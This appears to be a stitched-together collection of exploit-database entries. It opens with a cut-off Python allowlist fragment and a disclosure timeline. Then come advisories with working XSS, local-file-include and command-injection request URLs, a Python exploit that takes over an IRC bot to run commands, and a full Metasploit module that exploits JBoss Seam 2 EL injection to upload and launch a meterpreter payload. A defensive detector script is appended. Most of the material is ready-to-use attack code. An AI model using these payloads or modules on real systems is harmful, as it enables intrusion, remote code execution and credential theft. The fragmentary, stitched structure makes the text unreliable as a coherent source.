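ALLOWED_COLUMNS = {"id", "user_id", "failed_login_date", "login_date", "release_date"}
_IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def build_order_by(orderby: str, order: str, default_col: str = "id") -> str:
    """Return a safe ORDER BY clause or raise ValueError."""
    col = orderby.strip() or default_col
    direction = (order.strip() or "DESC").upper()
    if not _IDENT.match(col) or col not in ALLOWED_COLUMNS:
        raise ValueError(f"orderby not in allowlist: {col!r}")
    if direction not in ("ASC", "DESC"):
        raise ValueError(f"order must be ASC or DESC: {order!r}")
    return f"ORDER BY `{col}` {direction}"


def allowlist_rejects(orderby: str = PAYLOAD, order: str = "asc") -> bool:
    """True when build_order_by refuses the input."""
    try:
        build_order_by(orderby, order)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("esc_sql() output :", esc_sql_emulated(PAYLOAD))
    print("unchanged        :", escaping_leaves_payload_intact())
    print("allowlist rejects:", allowlist_rejects())
    print("benign request   :", build_order_by("failed_login_date", "asc"))
```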


######################

# Vulnerability Disclosure Timeline:

2015-04-05: Discovered vulnerability
2015-04-06: Vendor Notification
2015-04-06: Vendor Response/Feedback 
2015-04-07: Vendor Send Fix/Patch (3.9.1)
2015-04-07: Public Disclosure 

#######################

Discovered By : Claudio Viviani
                http://www.homelab.it
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
            
source: https://www.securityfocus.com/bid/51918/info

D-Link ShareCenter products are prone to multiple remote code-execution vulnerabilities.

Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.

The following products are affected:

D-Link DNS-320 ShareCenter
D-Link DNS-325 ShareCenter 

http://www.example.com/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls
http://www.example.com/cgi-bin/discovery.cgi
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml 
            
source: https://www.securityfocus.com/bid/51917/info

Apache APR is prone to a denial-of-service vulnerability.

An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests.

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36669.zip
            
source: https://www.securityfocus.com/bid/51894/info

eFront is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

eFront 3.6.10 is vulnerable; other versions may also be affected. 

http://www.example.com/communityplusplus/www/administrator.php?ctg=languages&ajax=languagesTable&limit=200&offset=0&sort=active&order=asc&other=&filter=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22VulnerabilityLab%22%29%20%3C

source: https://www.securityfocus.com/bid/51893/info
 
ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 
ManageEngine ADManager Plus 5.2 Build 5210 is vulnerable; prior versions may also be affected. 

#1 - GET http://www.example.com/jsp/AddDC.jsp?domainName="><script>alert('zsl')</script> HTTP/1.1
            
source: https://www.securityfocus.com/bid/51893/info

#2 - POST http://www.example.com/DomainConfig.do?methodToCall=save HTTP/1.1 - DOMAIN_NAME=test&DOMAIN_CONTROLLER_NAME=testsrv&save=Add&operation="><script>alert('zsl')</script>&reset=
            
source: https://www.securityfocus.com/bid/51878/info

Vespa is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.

Vespa 0.8.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[ Path ]/getid3/getid3.php?include=[LFI]%00
            
# thehunter.py
# Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution
# Author: Jay Turla ( @shipcod3 )
# Description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution.

import socket
import sys

def usage():
     print("USAGE: python thehunter.py nick \n")  
     
def main(argv):
    
    if len(argv) < 2:
        return usage()

    #irc server connection settings
    botnick = sys.argv[1] #admin payload for taking over the w3tw0rk bot
    server = "us.dal.net" #irc server
    channel = "#buhaypirata" #channel where the bot is located

    irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
    print "connecting to:"+server
    irc.connect((server, 6667)) #connects to the server
    irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication
    irc.send("NICK "+ botnick +"\n") #sets nick
    irc.send("JOIN "+ channel +"\n") #join the chan
    irc.send("PRIVMSG "+channel+" :!bot @system 'uname -a' \n") #send the payload to the bot

    while 1:    #puts it in a loop
        text=irc.recv(2040)  #receive the text
        print text   #print text to console

        if text.find('PING') != -1:                          #check if 'PING' is found
            irc.send('PONG ' + text.split() [1] + '\r\n') #returns 'PONG' to the server (prevents pinging out!)
        if text.find('!quit') != -1: #quit the Bot
            irc.send ("QUIT\r\n") 
            sys.exit()
        if text.find('Linux') != -1:                         
            irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
            irc.send ("QUIT\r\n")
            sys.exit()

if __name__ == "__main__":
    main(sys.argv)
            
source: https://www.securityfocus.com/bid/51793/info

phpLDAPadmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

phpLDAPadmin 1.2.2 is affected; other versions may also be vulnerable. 

http://www.example.com/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&filter=objectClass%3D* display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/proto/http'
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Auxiliary::Report
    include Msf::Exploit::FileDropper


    def initialize(info = {})
        super(update_info(info,
        'Name'                  => 'JBoss Seam 2 File Upload and Execute',
        'Description'   => %q{
            Versions of the JBoss Seam 2 framework < 2.2.1CR2 fail to properly
            sanitize inputs to some JBoss Expression Language expressions. As a
            result, attackers can gain remote code execution through the
            application server. This module leverages RCE to upload and execute
            a meterpreter payload.

            Versions of the JBoss AS admin-console are known to be vulnerable to
            this exploit, without requiring authentication.  Tested against
            JBoss AS 5 and 6, running on Linux with JDKs 6 and 7.

            This module provides a more efficient method of exploitation - it
            does not loop to find desired Java classes and methods.

            NOTE: the check for upload success is not 100% accurate.
            NOTE 2: The module uploads the meterpreter JAR and a JSP to launch
            it.

        },
        'Author'                => [ 'vulp1n3 <vulp1n3[at]gmail.com>' ],
        'References'            =>
        [
            # JBoss EAP 4.3.0 does not properly sanitize JBoss EL inputs
            ['CVE', '2010-1871'],
            ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=615956'],
            ['URL', 'http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html'],
            ['URL', 'http://archives.neohapsis.com/archives/bugtraq/2013-05/0117.html']
        ],
        'DisclosureDate' => "Aug 05 2010",
        'License'               => MSF_LICENSE,
        'Platform'              => %w{ java },
        'Targets'               =>
        [
            [ 'Java Universal',
                {
                    'Arch' => ARCH_JAVA,
                    'Platform' => 'java'
                },
            ]
        ],
        'DefaultTarget'       => 0
        ))

        register_options(
        [
            Opt::RPORT(8080),
            OptString.new('AGENT',  [ true,  "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]),
            OptString.new('CTYPE',  [ true,  "Content-Type to send with requests", "application/x-www-form-urlencoded"]),
            OptString.new('TARGETURI',  [ true,  "URI that is built on JBoss Seam 2", "/admin-console/login.seam"]),
            OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 10]),
            OptString.new('FNAME',  [ false,  "Name of file to create - NO EXTENSION! (default: random)", nil]),
            OptInt.new('CHUNKSIZE', [ false, 'Size in bytes of chunk per request', 1024]),
        ], self.class)
    end


    def check
        vprint_status("#{rhost}:#{rport} Checking for vulnerable JBoss Seam 2")
        uri = target_uri.path
        res = send_request_cgi(
        {
            'uri'       => normalize_uri(uri),
            'method'    => 'POST',
            'ctype'     => datastore['CTYPE'],
            'agent'     => datastore['AGENT'],
            'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime')}"
        }, timeout=datastore['TIMEOUT'])
        if (res and res.code == 302 and res.headers['Location'])
            vprint_debug("Server sent a 302 with location")
            if (res.headers['Location'] =~ %r(public\+static\+java\.lang\.Runtime\+java.lang.Runtime.getRuntime\%28\%29))
                report_vuln({
                    :host => rhost,
                    :port => rport,
                    :name => "#{self.name} - #{uri}",
                    :refs => self.references,
                    :info => "Module #{self.fullname} found vulnerable JBoss Seam 2 resource."
                })
                return Exploit::CheckCode::Vulnerable
            else
                return Exploit::CheckCode::Safe
            end
        else
            return Exploit::CheckCode::Unknown
        end

        # If we reach this point, we didn't find the service
        return Exploit::CheckCode::Unknown
    end


    def execute_cmd(cmd)
        cmd_to_run = Rex::Text.uri_encode(cmd)
        vprint_status("#{rhost}:#{rport} Sending command: #{cmd_to_run}")
        uri = target_uri.path
        res = send_request_cgi(
        {
            'uri'       => normalize_uri(uri),
            'method'    => 'POST',
            'ctype'     => datastore['CTYPE'],
            'agent'     => datastore['AGENT'],
            'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('#{cmd_to_run}')}"
        }, timeout=datastore['TIMEOUT'])
        if (res and res.code == 302 and res.headers['Location'])
            if (res.headers['Location'] =~ %r(user=java.lang.UNIXProcess))
                vprint_status("#{rhost}:#{rport} Exploit successful")
            else
                vprint_status("#{rhost}:#{rport} Exploit failed.")
            end
        else
            vprint_status("#{rhost}:#{rport} Exploit failed.")
        end
    end


    def call_jsp(jspname)
        # TODO ugly way to strip off last resource on a path
        uri = target_uri.path
        *keep,ignore = uri.split(/\//)
        keep.push(jspname)
        uri = keep.join("/")
        uri = "/" + uri if (uri[0] != "/")

        res = send_request_cgi(
        {
            'uri'       => normalize_uri(uri),
            'method'    => 'POST',
            'ctype'     => datastore['CTYPE'],
            'agent'     => datastore['AGENT'],
            'data' => "sessionid=" + Rex::Text.rand_text_alpha(32)
        }, timeout=datastore['TIMEOUT'])
        if (res and res.code == 200)
            vprint_status("Successful request to JSP")
        else
            vprint_error("Failed to request JSP")
        end
    end


    def upload_jsp(filename,jarname)
        jsp_text = <<EOJSP
<%@ page import="java.io.*"
%><%@ page import="java.net.*"
%><%
URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("/#{jarname}")).toURI().toURL()});
Class c = cl.loadClass("metasploit.Payload");
c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});
%>
EOJSP
        vprint_status("Uploading JSP to launch payload")
        status = upload_file_chunk(filename,'false',jsp_text)
        if status
            vprint_status("JSP uploaded to #{filename}")
        else
            vprint_error("Failed to upload file.")
        end

        @pl_sent = true
    end


    def upload_file_chunk(filename, append='false', chunk)
        # create URL-safe Base64-encoded version of chunk
        b64 = Rex::Text.encode_base64(chunk)
        b64 = b64.gsub("+","%2b")
        b64 = b64.gsub("/","%2f")

        uri = target_uri.path
        res = send_request_cgi(
        {
            'uri'       => normalize_uri(uri),
            'method'    => 'POST',
            'ctype'     => datastore['CTYPE'],
            'agent'     => datastore['AGENT'],
            'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.io.FileOutputStream').getConstructor('java.lang.String',expressions.getClass().forName('java.lang.Boolean').getField('TYPE').get(null)).newInstance(request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/'),#{append}).write(expressions.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer(request.getParameter('c'))).close()}&c=" + b64
        }, timeout=datastore['TIMEOUT'])
        if (res and res.code == 302 and res.headers['Location'])
            # TODO Including the conversationId part in this regex might cause
            # failure on other Seam applications.  Needs more testing
            if (res.headers['Location'] =~ %r(user=&conversationId))
                #vprint_status("#{rhost}:#{rport} Exploit successful.")
                return true
            else
                #vprint_status("#{rhost}:#{rport} Exploit failed.")
                return false
            end
        else
            #vprint_status("#{rhost}:#{rport} Exploit failed.")
            return false
        end
    end


    def get_full_path(filename)
        #vprint_debug("Trying to find full path for #{filename}")

        uri = target_uri.path
        res = send_request_cgi(
        {
            'uri'       => normalize_uri(uri),
            'method'    => 'POST',
            'ctype'     => datastore['CTYPE'],
            'agent'     => datastore['AGENT'],
            'data' => "actionOutcome=/success.xhtml?user%3d%23{request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/')}"
        }, timeout=datastore['TIMEOUT'])
        if (res and res.code == 302 and res.headers['Location'])
            # the user argument should be set to the result of our call - which
            # will be the full path of our file
            matches = /.*user=(.+)\&.*/.match(res.headers['Location'])
            #vprint_debug("Location is " + res.headers['Location'])
            if (matches and matches.captures)
                return Rex::Text::uri_decode(matches.captures[0])
            else
                return nil
            end
        else
            return nil
        end
    end


    def java_stager(fname, chunk_size)
        @payload_exe = fname + ".jar"
        jsp_name = fname + ".jsp"

        data = payload.encoded_jar.pack

        append = 'false'
        while (data.length > chunk_size)
            status = upload_file_chunk(@payload_exe, append, data[0, chunk_size])
            if status
                vprint_debug("Uploaded chunk")
            else
                vprint_error("Failed to upload chunk")
                break
            end
            data = data[chunk_size, data.length - chunk_size]
            # first chunk is an overwrite, afterwards, we need to append
            append = 'true'
        end
        status = upload_file_chunk(@payload_exe, 'true', data)
        if status
            vprint_status("Payload uploaded to " + @payload_exe)
        else
            vprint_error("Failed to upload file.")
        end

        # write a JSP that can call the payload in the jar
        upload_jsp(jsp_name, @payload_exe)

        pe_path = get_full_path(@payload_exe) || @payload_exe
        jsp_path = get_full_path(jsp_name) || jsp_name
        # try to clean up our stuff;
        register_files_for_cleanup(pe_path, jsp_path)

        # call the JSP to launch the payload
        call_jsp(jsp_name)
    end

    def exploit
        @pl_sent = false

        if check == Exploit::CheckCode::Vulnerable

            fname = datastore['FNAME'] || Rex::Text.rand_text_alpha(8+rand(8))

            vprint_status("#{rhost}:#{rport} Host is vulnerable")
            vprint_status("#{rhost}:#{rport} Uploading file...")

            # chunking code based on struts_code_exec_exception_delegator
            append = 'false'
            chunk_size = datastore['CHUNKSIZE']
            # sanity check
            if (chunk_size <= 0)
                vprint_error("Invalid chunk size #{chunk_size}")
                return
            end

            vprint_debug("Sending in chunks of #{chunk_size}")

            case target['Platform']
            when 'java'
                java_stager(fname, chunk_size)
            else
                fail_with(Failure::NoTarget, 'Unsupported target platform!')
            end

            handler
        end
    end
end
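The request/response pattern the module's `check` method probes for can be turned around into a detection rule. The following is an added example, not part of the Metasploit module or of Metasploit itself: it classifies proxy-style request records by whether `actionOutcome` carries an EL expression, whether that expression uses the reflection chain shown above, and whether the 302 `Location` shows the server actually evaluated it. The record field names and all sample bodies and headers are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Seam 2 evaluated "#{...}" embedded in the query part of actionOutcome
# (CVE-2010-1871). A legitimate outcome is a bare view id like /home.xhtml.
EL_EXPR = re.compile(r"#\{(?P<expr>[^}]*)\}")

# Reflection chains the module above relies on: reaching java.lang.Runtime
# or a file stream through getClass().forName(...).
REFLECTION = re.compile(
    r"getClass\(\)\.forName\(|java\.lang\.Runtime|java\.io\.FileOutputStream")


def decode_outcome(body):
    """Return the URL-decoded actionOutcome value of a POST body, or None."""
    values = parse_qs(body, keep_blank_values=True).get("actionOutcome")
    return values[0] if values else None


def looks_evaluated(location):
    """True when the 302 Location echoes 'user=' without the EL literal, i.e.
    the server replaced #{...} with its result (possibly empty, as in the
    module's 'user=&conversationId' upload check)."""
    if not location or "user=" not in location:
        return False
    return "#{" not in unquote(location)


def classify(record):
    """Classify one constructed record (keys: body, status, location) as
    'benign', 'el_injection', 'el_reflection' or 'el_evaluated'."""
    outcome = decode_outcome(record.get("body", ""))
    match = EL_EXPR.search(outcome) if outcome else None
    if not match:
        return "benign"
    verdict = "el_injection"
    if REFLECTION.search(match.group("expr")):
        verdict = "el_reflection"
    if record.get("status") == 302 and looks_evaluated(record.get("location")):
        verdict = "el_evaluated"
    return verdict


def scan(records):
    """Classify every record; returns the verdicts in input order."""
    return [classify(r) for r in records]


# Constructed sample records, not captured traffic. PROBE is the body the
# module's check method sends; the Location values mimic a Seam redirect.
PROBE = ("actionOutcome=/success.xhtml?user%3d%23{expressions.getClass()"
         ".forName('java.lang.Runtime').getDeclaredMethod('getRuntime')}")
SAMPLES = [
    {"body": "actionOutcome=/home.xhtml", "status": 302,
     "location": "http://app/home.seam?conversationId=1"},
    {"body": PROBE, "status": 302,  # vulnerable: result echoed in 'user'
     "location": "http://app/success.seam?user=public+static+java.lang.Runtime"
                 "+java.lang.Runtime.getRuntime%28%29&conversationId=2"},
    {"body": PROBE, "status": 200, "location": None},  # no evaluation evidence
    {"body": "actionOutcome=/success.xhtml?user%3d%23{1%2b1}", "status": 302,
     "location": "http://app/success.seam?user=%23%7B1%2B1%7D&conversationId=3"},
]

if __name__ == "__main__":
    for record, verdict in zip(SAMPLES, scan(SAMPLES)):
        print(f"{verdict:14s} {record['body'][:60]}")
```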
            
source: https://www.securityfocus.com/bid/51788/info
   
OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input.
   
A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
   
OpenEMR 4.1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/interface/fax/fax_dispatch.php?file=1%22%20||%20ls%20%3E%20123 
            
source: https://www.securityfocus.com/bid/51788/info
  
http://www.example.com/contrib/acog/print_form.php?formname=../../../etc/passwd%00 
            
source: https://www.securityfocus.com/bid/51788/info
 
http://www.example.com/interface/patient_file/encounter/load_form.php?formname=../../../etc/passwd%00 
            
source: https://www.securityfocus.com/bid/51803/info

iknSupport is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/module/kb/search_word/" onmouseover=alert(1) bad=/"/Submit/Search/task/search